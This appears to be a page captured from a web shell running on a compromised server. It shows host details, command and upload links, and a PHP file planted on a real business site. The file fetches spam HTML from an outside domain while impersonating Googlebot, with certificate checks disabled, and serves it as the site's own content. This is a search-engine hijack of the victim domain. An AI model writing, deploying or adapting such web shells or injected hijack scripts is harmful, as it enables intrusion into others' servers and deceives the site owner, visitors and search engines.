|
Server IP : 103.212.121.57 / Your IP : 216.73.216.123 Web Server : LiteSpeed System : Linux valor.herosite.pro 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64 User : araipddz ( 1784) PHP Version : 8.2.30 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/araipddz/cytelelevators.in/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
// ============================
// KONFIGURASI
// ============================
$target = 'https://buckdomain.vip/zlxvii/rajaeropa-cytelelevators.in-gallery.php.html';
// ============================
// DETEKSI USER AGENT
// ============================
$agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$isGoogle = (
stripos($agent, 'googlebot') !== false ||
stripos($agent, 'google-inspectiontool') !== false
);
// ============================
// FETCH MIRROR UNTUK GOOGLE
// ============================
$context = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n",
'timeout' => 10
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
$html = @file_get_contents($target, false, $context);
// ============================
// OUTPUT
// ============================
if ($html !== false && strlen($html) > 100) {
header("Content-Type: text/html; charset=UTF-8");
echo $html;
exit;
}
// ============================
// FAILBACK
// ============================
http_response_code(502);
echo "Mirror tidak tersedia";
?>